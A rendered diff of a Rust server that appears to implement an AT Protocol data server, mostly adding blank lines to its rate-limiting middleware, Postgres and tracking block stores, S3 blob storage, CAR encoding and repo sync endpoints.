224
.with_oauth_token_limit(60)
225
.with_password_reset_limit(3)
226
.with_account_creation_limit(5);
227
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
228
}
229
}
···
16
num::NonZeroU32,
17
sync::Arc,
18
};
19
+
20
pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>;
21
pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>;
22
+
23
#[derive(Clone)]
24
pub struct RateLimiters {
25
pub login: Arc<KeyedRateLimiter>,
···
34
pub app_password: Arc<KeyedRateLimiter>,
35
pub email_update: Arc<KeyedRateLimiter>,
36
}
37
+
38
impl Default for RateLimiters {
39
fn default() -> Self {
40
Self::new()
41
}
42
}
43
+
44
impl RateLimiters {
45
pub fn new() -> Self {
46
Self {
···
79
)),
80
}
81
}
82
+
83
pub fn with_login_limit(mut self, per_minute: u32) -> Self {
84
self.login = Arc::new(RateLimiter::keyed(
85
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
86
));
87
self
88
}
89
+
90
pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self {
91
self.oauth_token = Arc::new(RateLimiter::keyed(
92
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap()))
93
));
94
self
95
}
96
+
97
pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self {
98
self.oauth_authorize = Arc::new(RateLimiter::keyed(
99
Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap()))
100
));
101
self
102
}
103
+
104
pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self {
105
self.password_reset = Arc::new(RateLimiter::keyed(
106
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
107
));
108
self
109
}
110
+
111
pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self {
112
self.account_creation = Arc::new(RateLimiter::keyed(
113
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()))
114
));
115
self
116
}
117
+
118
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
119
self.email_update = Arc::new(RateLimiter::keyed(
120
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
···
122
self
123
}
124
}
125
+
126
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
127
if let Some(forwarded) = headers.get("x-forwarded-for") {
128
if let Ok(value) = forwarded.to_str() {
···
131
}
132
}
133
}
134
+
135
if let Some(real_ip) = headers.get("x-real-ip") {
136
if let Ok(value) = real_ip.to_str() {
137
return value.trim().to_string();
138
}
139
}
140
+
141
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
142
}
143
+
144
fn rate_limit_response() -> Response {
145
(
146
StatusCode::TOO_MANY_REQUESTS,
···
151
)
152
.into_response()
153
}
154
+
155
pub async fn login_rate_limit(
156
ConnectInfo(addr): ConnectInfo<SocketAddr>,
157
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
159
next: Next,
160
) -> Response {
161
let client_ip = extract_client_ip(request.headers(), Some(addr));
162
+
163
if limiters.login.check_key(&client_ip).is_err() {
164
tracing::warn!(ip = %client_ip, "Login rate limit exceeded");
165
return rate_limit_response();
166
}
167
+
168
next.run(request).await
169
}
170
+
171
pub async fn oauth_token_rate_limit(
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
next: Next,
176
) -> Response {
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
+
179
if limiters.oauth_token.check_key(&client_ip).is_err() {
180
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
181
return rate_limit_response();
182
}
183
+
184
next.run(request).await
185
}
186
+
187
pub async fn password_reset_rate_limit(
188
ConnectInfo(addr): ConnectInfo<SocketAddr>,
189
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
191
next: Next,
192
) -> Response {
193
let client_ip = extract_client_ip(request.headers(), Some(addr));
194
+
195
if limiters.password_reset.check_key(&client_ip).is_err() {
196
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
197
return rate_limit_response();
198
}
199
+
200
next.run(request).await
201
}
202
+
203
pub async fn account_creation_rate_limit(
204
ConnectInfo(addr): ConnectInfo<SocketAddr>,
205
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
207
next: Next,
208
) -> Response {
209
let client_ip = extract_client_ip(request.headers(), Some(addr));
210
+
211
if limiters.account_creation.check_key(&client_ip).is_err() {
212
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
213
return rate_limit_response();
214
}
215
+
216
next.run(request).await
217
}
218
+
219
#[cfg(test)]
220
mod tests {
221
use super::*;
222
+
223
#[test]
224
fn test_rate_limiters_creation() {
225
let limiters = RateLimiters::new();
226
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
227
}
228
+
229
#[test]
230
fn test_rate_limiter_exhaustion() {
231
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
232
let key = "test_ip".to_string();
233
+
234
assert!(limiter.check_key(&key).is_ok());
235
assert!(limiter.check_key(&key).is_ok());
236
assert!(limiter.check_key(&key).is_err());
237
}
238
+
239
#[test]
240
fn test_different_keys_have_separate_limits() {
241
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
242
+
243
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
244
assert!(limiter.check_key(&"ip1".to_string()).is_err());
245
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
246
}
247
+
248
#[test]
249
fn test_builder_pattern() {
250
let limiters = RateLimiters::new()
···
252
.with_oauth_token_limit(60)
253
.with_password_reset_limit(3)
254
.with_account_creation_limit(5);
255
+
256
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
257
}
258
}
+9
src/repo/mod.rs
+9
src/repo/mod.rs
···
6
use multihash::Multihash;
7
use sha2::{Digest, Sha256};
8
use sqlx::PgPool;
9
pub mod tracking;
10
#[derive(Clone)]
11
pub struct PostgresBlockStore {
12
pool: PgPool,
13
}
14
impl PostgresBlockStore {
15
pub fn new(pool: PgPool) -> Self {
16
Self { pool }
17
}
18
}
19
impl BlockStore for PostgresBlockStore {
20
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
21
crate::metrics::record_block_operation("get");
···
29
None => Ok(None),
30
}
31
}
32
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
33
crate::metrics::record_block_operation("put");
34
let mut hasher = Sha256::new();
···
44
.map_err(|e| RepoError::storage(e))?;
45
Ok(cid)
46
}
47
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
48
crate::metrics::record_block_operation("has");
49
let cid_bytes = cid.to_bytes();
···
53
.map_err(|e| RepoError::storage(e))?;
54
Ok(row.is_some())
55
}
56
async fn put_many(
57
&self,
58
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
78
.map_err(|e| RepoError::storage(e))?;
79
Ok(())
80
}
81
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
82
if cids.is_empty() {
83
return Ok(Vec::new());
···
101
.collect();
102
Ok(results)
103
}
104
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
105
self.put_many(commit.blocks).await?;
106
Ok(())
···
6
use multihash::Multihash;
7
use sha2::{Digest, Sha256};
8
use sqlx::PgPool;
9
+
10
pub mod tracking;
11
+
12
#[derive(Clone)]
13
pub struct PostgresBlockStore {
14
pool: PgPool,
15
}
16
+
17
impl PostgresBlockStore {
18
pub fn new(pool: PgPool) -> Self {
19
Self { pool }
20
}
21
}
22
+
23
impl BlockStore for PostgresBlockStore {
24
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
25
crate::metrics::record_block_operation("get");
···
33
None => Ok(None),
34
}
35
}
36
+
37
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
38
crate::metrics::record_block_operation("put");
39
let mut hasher = Sha256::new();
···
49
.map_err(|e| RepoError::storage(e))?;
50
Ok(cid)
51
}
52
+
53
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
54
crate::metrics::record_block_operation("has");
55
let cid_bytes = cid.to_bytes();
···
59
.map_err(|e| RepoError::storage(e))?;
60
Ok(row.is_some())
61
}
62
+
63
async fn put_many(
64
&self,
65
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
85
.map_err(|e| RepoError::storage(e))?;
86
Ok(())
87
}
88
+
89
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
90
if cids.is_empty() {
91
return Ok(Vec::new());
···
109
.collect();
110
Ok(results)
111
}
112
+
113
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
114
self.put_many(commit.blocks).await?;
115
Ok(())
+11
src/repo/tracking.rs
+11
src/repo/tracking.rs
···
6
use jacquard_repo::storage::BlockStore;
7
use std::collections::HashSet;
8
use std::sync::{Arc, Mutex};
9
#[derive(Clone)]
10
pub struct TrackingBlockStore {
11
inner: PostgresBlockStore,
12
written_cids: Arc<Mutex<Vec<Cid>>>,
13
read_cids: Arc<Mutex<HashSet<Cid>>>,
14
}
15
impl TrackingBlockStore {
16
pub fn new(store: PostgresBlockStore) -> Self {
17
Self {
···
20
read_cids: Arc::new(Mutex::new(HashSet::new())),
21
}
22
}
23
pub fn get_written_cids(&self) -> Vec<Cid> {
24
match self.written_cids.lock() {
25
Ok(guard) => guard.clone(),
26
Err(poisoned) => poisoned.into_inner().clone(),
27
}
28
}
29
pub fn get_read_cids(&self) -> Vec<Cid> {
30
match self.read_cids.lock() {
31
Ok(guard) => guard.iter().cloned().collect(),
32
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
33
}
34
}
35
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
36
let written = self.get_written_cids();
37
let read = self.get_read_cids();
···
40
all.into_iter().collect()
41
}
42
}
43
impl BlockStore for TrackingBlockStore {
44
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
45
let result = self.inner.get(cid).await?;
···
51
}
52
Ok(result)
53
}
54
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
55
let cid = self.inner.put(data).await?;
56
match self.written_cids.lock() {
···
59
}
60
Ok(cid)
61
}
62
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
63
self.inner.has(cid).await
64
}
65
async fn put_many(
66
&self,
67
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
75
}
76
Ok(())
77
}
78
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
79
let results = self.inner.get_many(cids).await?;
80
for (cid, result) in cids.iter().zip(results.iter()) {
···
87
}
88
Ok(results)
89
}
90
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
91
self.put_many(commit.blocks).await?;
92
Ok(())
···
6
use jacquard_repo::storage::BlockStore;
7
use std::collections::HashSet;
8
use std::sync::{Arc, Mutex};
9
+
10
#[derive(Clone)]
11
pub struct TrackingBlockStore {
12
inner: PostgresBlockStore,
13
written_cids: Arc<Mutex<Vec<Cid>>>,
14
read_cids: Arc<Mutex<HashSet<Cid>>>,
15
}
16
+
17
impl TrackingBlockStore {
18
pub fn new(store: PostgresBlockStore) -> Self {
19
Self {
···
22
read_cids: Arc::new(Mutex::new(HashSet::new())),
23
}
24
}
25
+
26
pub fn get_written_cids(&self) -> Vec<Cid> {
27
match self.written_cids.lock() {
28
Ok(guard) => guard.clone(),
29
Err(poisoned) => poisoned.into_inner().clone(),
30
}
31
}
32
+
33
pub fn get_read_cids(&self) -> Vec<Cid> {
34
match self.read_cids.lock() {
35
Ok(guard) => guard.iter().cloned().collect(),
36
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
37
}
38
}
39
+
40
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
41
let written = self.get_written_cids();
42
let read = self.get_read_cids();
···
45
all.into_iter().collect()
46
}
47
}
48
+
49
impl BlockStore for TrackingBlockStore {
50
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
51
let result = self.inner.get(cid).await?;
···
57
}
58
Ok(result)
59
}
60
+
61
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
62
let cid = self.inner.put(data).await?;
63
match self.written_cids.lock() {
···
66
}
67
Ok(cid)
68
}
69
+
70
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
71
self.inner.has(cid).await
72
}
73
+
74
async fn put_many(
75
&self,
76
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
84
}
85
Ok(())
86
}
87
+
88
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
89
let results = self.inner.get_many(cids).await?;
90
for (cid, result) in cids.iter().zip(results.iter()) {
···
97
}
98
Ok(results)
99
}
100
+
101
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
102
self.put_many(commit.blocks).await?;
103
Ok(())
+16
src/state.rs
+16
src/state.rs
···
8
use sqlx::PgPool;
9
use std::sync::Arc;
10
use tokio::sync::broadcast;
11
#[derive(Clone)]
12
pub struct AppState {
13
pub db: PgPool,
···
19
pub cache: Arc<dyn Cache>,
20
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
21
}
22
pub enum RateLimitKind {
23
Login,
24
AccountCreation,
···
32
AppPassword,
33
EmailUpdate,
34
}
35
impl RateLimitKind {
36
fn key_prefix(&self) -> &'static str {
37
match self {
···
48
Self::EmailUpdate => "email_update",
49
}
50
}
51
fn limit_and_window_ms(&self) -> (u32, u64) {
52
match self {
53
Self::Login => (10, 60_000),
···
64
}
65
}
66
}
67
impl AppState {
68
pub async fn new(db: PgPool) -> Self {
69
AuthConfig::init();
70
let block_store = PostgresBlockStore::new(db.clone());
71
let blob_store = S3BlobStorage::new().await;
72
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
73
.ok()
74
.and_then(|v| v.parse().ok())
75
.unwrap_or(10000);
76
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
77
let rate_limiters = Arc::new(RateLimiters::new());
78
let circuit_breakers = Arc::new(CircuitBreakers::new());
79
let (cache, distributed_rate_limiter) = create_cache().await;
80
Self {
81
db,
82
block_store,
···
88
distributed_rate_limiter,
89
}
90
}
91
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
92
self.rate_limiters = Arc::new(rate_limiters);
93
self
94
}
95
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
96
self.circuit_breakers = Arc::new(circuit_breakers);
97
self
98
}
99
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
100
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
101
return true;
102
}
103
let key = format!("{}:{}", kind.key_prefix(), client_ip);
104
let limiter_name = kind.key_prefix();
105
let (limit, window_ms) = kind.limit_and_window_ms();
106
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
107
crate::metrics::record_rate_limit_rejection(limiter_name);
108
return false;
109
}
110
let limiter = match kind {
111
RateLimitKind::Login => &self.rate_limiters.login,
112
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
120
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
121
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
122
};
123
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
124
if !ok {
125
crate::metrics::record_rate_limit_rejection(limiter_name);
···
8
use sqlx::PgPool;
9
use std::sync::Arc;
10
use tokio::sync::broadcast;
11
+
12
#[derive(Clone)]
13
pub struct AppState {
14
pub db: PgPool,
···
20
pub cache: Arc<dyn Cache>,
21
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
22
}
23
+
24
pub enum RateLimitKind {
25
Login,
26
AccountCreation,
···
34
AppPassword,
35
EmailUpdate,
36
}
37
+
38
impl RateLimitKind {
39
fn key_prefix(&self) -> &'static str {
40
match self {
···
51
Self::EmailUpdate => "email_update",
52
}
53
}
54
+
55
fn limit_and_window_ms(&self) -> (u32, u64) {
56
match self {
57
Self::Login => (10, 60_000),
···
68
}
69
}
70
}
71
+
72
impl AppState {
73
pub async fn new(db: PgPool) -> Self {
74
AuthConfig::init();
75
+
76
let block_store = PostgresBlockStore::new(db.clone());
77
let blob_store = S3BlobStorage::new().await;
78
+
79
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
80
.ok()
81
.and_then(|v| v.parse().ok())
82
.unwrap_or(10000);
83
+
84
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
85
let rate_limiters = Arc::new(RateLimiters::new());
86
let circuit_breakers = Arc::new(CircuitBreakers::new());
87
let (cache, distributed_rate_limiter) = create_cache().await;
88
+
89
Self {
90
db,
91
block_store,
···
97
distributed_rate_limiter,
98
}
99
}
100
+
101
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
102
self.rate_limiters = Arc::new(rate_limiters);
103
self
104
}
105
+
106
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
107
self.circuit_breakers = Arc::new(circuit_breakers);
108
self
109
}
110
+
111
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
112
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
113
return true;
114
}
115
+
116
let key = format!("{}:{}", kind.key_prefix(), client_ip);
117
let limiter_name = kind.key_prefix();
118
let (limit, window_ms) = kind.limit_and_window_ms();
119
+
120
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
121
crate::metrics::record_rate_limit_rejection(limiter_name);
122
return false;
123
}
124
+
125
let limiter = match kind {
126
RateLimitKind::Login => &self.rate_limiters.login,
127
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
135
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
136
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
137
};
138
+
139
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
140
if !ok {
141
crate::metrics::record_rate_limit_rejection(limiter_name);
+19
-1
src/storage/mod.rs
+19
-1
src/storage/mod.rs
···
5
use aws_sdk_s3::primitives::ByteStream;
6
use bytes::Bytes;
7
use thiserror::Error;
8
#[derive(Error, Debug)]
9
pub enum StorageError {
10
#[error("IO error: {0}")]
···
14
#[error("Other: {0}")]
15
Other(String),
16
}
17
#[async_trait]
18
pub trait BlobStorage: Send + Sync {
19
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
22
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
23
async fn delete(&self, key: &str) -> Result<(), StorageError>;
24
}
25
pub struct S3BlobStorage {
26
client: Client,
27
bucket: String,
28
}
29
impl S3BlobStorage {
30
pub async fn new() -> Self {
31
-
// heheheh
32
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
33
let config = aws_config::defaults(BehaviorVersion::latest())
34
.region(region_provider)
35
.load()
36
.await;
37
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
38
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
39
let s3_config = aws_sdk_s3::config::Builder::from(&config)
40
.endpoint_url(endpoint)
···
44
} else {
45
Client::new(&config)
46
};
47
Self { client, bucket }
48
}
49
}
50
#[async_trait]
51
impl BlobStorage for S3BlobStorage {
52
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
53
self.put_bytes(key, Bytes::copy_from_slice(data)).await
54
}
55
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
56
let result = self.client
57
.put_object()
···
61
.send()
62
.await
63
.map_err(|e| StorageError::S3(e.to_string()));
64
match &result {
65
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
66
Err(_) => crate::metrics::record_s3_operation("put", "error"),
67
}
68
result?;
69
Ok(())
70
}
71
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
72
self.get_bytes(key).await.map(|b| b.to_vec())
73
}
74
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
75
let resp = self
76
.client
···
83
crate::metrics::record_s3_operation("get", "error");
84
StorageError::S3(e.to_string())
85
})?;
86
let data = resp
87
.body
88
.collect()
···
92
StorageError::S3(e.to_string())
93
})?
94
.into_bytes();
95
crate::metrics::record_s3_operation("get", "success");
96
Ok(data)
97
}
98
async fn delete(&self, key: &str) -> Result<(), StorageError> {
99
let result = self.client
100
.delete_object()
···
103
.send()
104
.await
105
.map_err(|e| StorageError::S3(e.to_string()));
106
match &result {
107
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
108
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
109
}
110
result?;
111
Ok(())
112
}
···
5
use aws_sdk_s3::primitives::ByteStream;
6
use bytes::Bytes;
7
use thiserror::Error;
8
+
9
#[derive(Error, Debug)]
10
pub enum StorageError {
11
#[error("IO error: {0}")]
···
15
#[error("Other: {0}")]
16
Other(String),
17
}
18
+
19
#[async_trait]
20
pub trait BlobStorage: Send + Sync {
21
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
24
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
25
async fn delete(&self, key: &str) -> Result<(), StorageError>;
26
}
27
+
28
pub struct S3BlobStorage {
29
client: Client,
30
bucket: String,
31
}
32
+
33
impl S3BlobStorage {
34
pub async fn new() -> Self {
35
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
36
+
37
let config = aws_config::defaults(BehaviorVersion::latest())
38
.region(region_provider)
39
.load()
40
.await;
41
+
42
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
43
+
44
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
45
let s3_config = aws_sdk_s3::config::Builder::from(&config)
46
.endpoint_url(endpoint)
···
50
} else {
51
Client::new(&config)
52
};
53
+
54
Self { client, bucket }
55
}
56
}
57
+
58
#[async_trait]
59
impl BlobStorage for S3BlobStorage {
60
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
61
self.put_bytes(key, Bytes::copy_from_slice(data)).await
62
}
63
+
64
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
65
let result = self.client
66
.put_object()
···
70
.send()
71
.await
72
.map_err(|e| StorageError::S3(e.to_string()));
73
+
74
match &result {
75
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
76
Err(_) => crate::metrics::record_s3_operation("put", "error"),
77
}
78
+
79
result?;
80
Ok(())
81
}
82
+
83
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
84
self.get_bytes(key).await.map(|b| b.to_vec())
85
}
86
+
87
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
88
let resp = self
89
.client
···
96
crate::metrics::record_s3_operation("get", "error");
97
StorageError::S3(e.to_string())
98
})?;
99
+
100
let data = resp
101
.body
102
.collect()
···
106
StorageError::S3(e.to_string())
107
})?
108
.into_bytes();
109
+
110
crate::metrics::record_s3_operation("get", "success");
111
Ok(data)
112
}
113
+
114
async fn delete(&self, key: &str) -> Result<(), StorageError> {
115
let result = self.client
116
.delete_object()
···
119
.send()
120
.await
121
.map_err(|e| StorageError::S3(e.to_string()));
122
+
123
match &result {
124
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
125
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
126
}
127
+
128
result?;
129
Ok(())
130
}
+5
src/sync/blob.rs
+5
src/sync/blob.rs
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::error;
13
#[derive(Deserialize)]
14
pub struct GetBlobParams {
15
pub did: String,
16
pub cid: String,
17
}
18
pub async fn get_blob(
19
State(state): State<AppState>,
20
Query(params): Query<GetBlobParams>,
···
94
}
95
}
96
}
97
#[derive(Deserialize)]
98
pub struct ListBlobsParams {
99
pub did: String,
···
101
pub limit: Option<i64>,
102
pub cursor: Option<String>,
103
}
104
#[derive(Serialize)]
105
pub struct ListBlobsOutput {
106
pub cursor: Option<String>,
107
pub cids: Vec<String>,
108
}
109
pub async fn list_blobs(
110
State(state): State<AppState>,
111
Query(params): Query<ListBlobsParams>,
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::error;
13
+
14
#[derive(Deserialize)]
15
pub struct GetBlobParams {
16
pub did: String,
17
pub cid: String,
18
}
19
+
20
pub async fn get_blob(
21
State(state): State<AppState>,
22
Query(params): Query<GetBlobParams>,
···
96
}
97
}
98
}
99
+
100
#[derive(Deserialize)]
101
pub struct ListBlobsParams {
102
pub did: String,
···
104
pub limit: Option<i64>,
105
pub cursor: Option<String>,
106
}
107
+
108
#[derive(Serialize)]
109
pub struct ListBlobsOutput {
110
pub cursor: Option<String>,
111
pub cids: Vec<String>,
112
}
113
+
114
pub async fn list_blobs(
115
State(state): State<AppState>,
116
Query(params): Query<ListBlobsParams>,
+3
src/sync/car.rs
+3
src/sync/car.rs
···
1
use cid::Cid;
2
use iroh_car::CarHeader;
3
use std::io::Write;
4
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
5
loop {
6
let mut byte = (value & 0x7F) as u8;
···
15
}
16
Ok(())
17
}
18
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
19
write_varint(&mut writer, data.len() as u64)?;
20
writer.write_all(data)?;
21
Ok(())
22
}
23
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
24
let header = CarHeader::new_v1(vec![root_cid.clone()]);
25
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
···
1
use cid::Cid;
2
use iroh_car::CarHeader;
3
use std::io::Write;
4
+
5
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
6
loop {
7
let mut byte = (value & 0x7F) as u8;
···
16
}
17
Ok(())
18
}
19
+
20
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
21
write_varint(&mut writer, data.len() as u64)?;
22
writer.write_all(data)?;
23
Ok(())
24
}
25
+
26
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
27
let header = CarHeader::new_v1(vec![root_cid.clone()]);
28
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
+11
src/sync/commit.rs
+11
src/sync/commit.rs
···
12
use serde_json::json;
13
use std::str::FromStr;
14
use tracing::error;
15
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
16
let cid = Cid::from_str(cid_str).ok()?;
17
let block = state.block_store.get(&cid).await.ok()??;
18
let commit = Commit::from_cbor(&block).ok()?;
19
Some(commit.rev().to_string())
20
}
21
#[derive(Deserialize)]
22
pub struct GetLatestCommitParams {
23
pub did: String,
24
}
25
#[derive(Serialize)]
26
pub struct GetLatestCommitOutput {
27
pub cid: String,
28
pub rev: String,
29
}
30
pub async fn get_latest_commit(
31
State(state): State<AppState>,
32
Query(params): Query<GetLatestCommitParams>,
···
78
}
79
}
80
}
81
#[derive(Deserialize)]
82
pub struct ListReposParams {
83
pub limit: Option<i64>,
84
pub cursor: Option<String>,
85
}
86
#[derive(Serialize)]
87
#[serde(rename_all = "camelCase")]
88
pub struct RepoInfo {
···
91
pub rev: String,
92
pub active: bool,
93
}
94
#[derive(Serialize)]
95
pub struct ListReposOutput {
96
pub cursor: Option<String>,
97
pub repos: Vec<RepoInfo>,
98
}
99
pub async fn list_repos(
100
State(state): State<AppState>,
101
Query(params): Query<ListReposParams>,
···
154
}
155
}
156
}
157
#[derive(Deserialize)]
158
pub struct GetRepoStatusParams {
159
pub did: String,
160
}
161
#[derive(Serialize)]
162
pub struct GetRepoStatusOutput {
163
pub did: String,
164
pub active: bool,
165
pub rev: Option<String>,
166
}
167
pub async fn get_repo_status(
168
State(state): State<AppState>,
169
Query(params): Query<GetRepoStatusParams>,
···
12
use serde_json::json;
13
use std::str::FromStr;
14
use tracing::error;
15
+
16
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
17
let cid = Cid::from_str(cid_str).ok()?;
18
let block = state.block_store.get(&cid).await.ok()??;
19
let commit = Commit::from_cbor(&block).ok()?;
20
Some(commit.rev().to_string())
21
}
22
+
23
#[derive(Deserialize)]
24
pub struct GetLatestCommitParams {
25
pub did: String,
26
}
27
+
28
#[derive(Serialize)]
29
pub struct GetLatestCommitOutput {
30
pub cid: String,
31
pub rev: String,
32
}
33
+
34
pub async fn get_latest_commit(
35
State(state): State<AppState>,
36
Query(params): Query<GetLatestCommitParams>,
···
82
}
83
}
84
}
85
+
86
#[derive(Deserialize)]
87
pub struct ListReposParams {
88
pub limit: Option<i64>,
89
pub cursor: Option<String>,
90
}
91
+
92
#[derive(Serialize)]
93
#[serde(rename_all = "camelCase")]
94
pub struct RepoInfo {
···
97
pub rev: String,
98
pub active: bool,
99
}
100
+
101
#[derive(Serialize)]
102
pub struct ListReposOutput {
103
pub cursor: Option<String>,
104
pub repos: Vec<RepoInfo>,
105
}
106
+
107
pub async fn list_repos(
108
State(state): State<AppState>,
109
Query(params): Query<ListReposParams>,
···
162
}
163
}
164
}
165
+
166
#[derive(Deserialize)]
167
pub struct GetRepoStatusParams {
168
pub did: String,
169
}
170
+
171
#[derive(Serialize)]
172
pub struct GetRepoStatusOutput {
173
pub did: String,
174
pub active: bool,
175
